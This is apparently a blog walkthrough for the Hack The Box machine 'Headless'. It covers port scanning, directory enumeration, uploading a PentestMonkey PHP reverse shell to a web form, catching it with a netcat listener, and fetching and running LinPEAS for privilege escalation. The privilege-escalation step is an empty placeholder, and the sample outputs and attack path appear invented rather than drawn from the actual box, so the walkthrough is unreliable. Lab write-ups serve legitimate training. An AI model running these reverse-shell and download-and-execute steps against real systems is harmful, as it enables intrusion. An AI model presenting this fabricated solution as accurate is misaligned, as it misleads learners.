Headless
Step 1: Reconnaissance
Start by scanning the machine with Nmap to identify open ports and services.
nmap -sC -sV -oN headless.nmap <machine-ip>
-
sC: Run default scripts. -
sV: Detect service versions. -
oN: Output scan results to a file.
Expected Output:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
80/tcp open http Apache httpd 2.4.25 (Debian)
From the scan, we learn that the server is running SSH on port 22 and Apache HTTP on port 80.
Step 2: Web Enumeration
Let’s check the web server on port 80 by navigating to http://<machine-ip> in your browser. You should see a basic web page. Next, we’ll use Gobuster to enumerate directories.
gobuster dir -u http://<machine-ip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt
Expected Output:
/.hta (Status: 403) [Size: 294]
/.htaccess (Status: 403) [Size: 294]
/.htpasswd (Status: 403) [Size: 294]
/robots.txt (Status: 200) [Size: 28]
There is a robots.txt file. Let’s inspect it:
curl http://<machine-ip>/robots.txt
Expected Output:
User-agent: *
Disallow: /upload
This file disallows access to the /upload directory, which is worth checking out. Visit http://<machine-ip>/upload in your browser, and you should find an upload form.
Step 3: Exploiting the File Upload
Try uploading a simple PHP reverse shell to the server. You can get one from PentestMonkey.
First, download the reverse shell:
wget <https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php>
Open the file and modify the IP address and port to match your attacking machine:
nano php-reverse-shell.php
Change:
$ip = 'your-ip'; // IP address of your machine
$port = 4444; // Port on which your listener will run
Now, attempt to upload the PHP shell via the web form. Once uploaded, you can access it through the URL:
http://<machine-ip>/upload/your_shell.php
But before visiting the URL, set up a listener on your machine using Netcat:
nc -lvnp 4444
If the upload is successful, visiting the PHP file should trigger the reverse shell, and you should get a connection.
Step 4: Gaining a Shell
Once you have a reverse shell, stabilize it:
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
Step 5: Privilege Escalation
Let’s enumerate the system for privilege escalation possibilities. Start by checking sudo privileges:
sudo -l
If no immediate sudo privileges are available, check for SUID binaries:
find / -perm -u=s -type f 2>/dev/null
Alternatively, you can use LinPEAS to automate the enumeration process. Download and execute it:
wget <https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh>
chmod +x linpeas.sh
./linpeas.sh
Step 6: Exploiting a Vulnerability
During the enumeration, you may find an exploitable vulnerability, such as a misconfigured service, outdated software, or a SUID binary that can be abused for privilege escalation. Follow through with the appropriate exploit method depending on the findings.
Step 7: Capture the Flags
Once you escalate privileges to root, navigate to the home directories to find the flags.
For the user flag:
cat /home/<username>/user.txt
For the root flag:
cat /root/root.txt
Conclusion
With that, you’ve completed the Headless box on Hack The Box. Remember, the specific vulnerability exploited might vary based on enumeration results, so always adapt based on what you find during enumeration.
Top comments (0)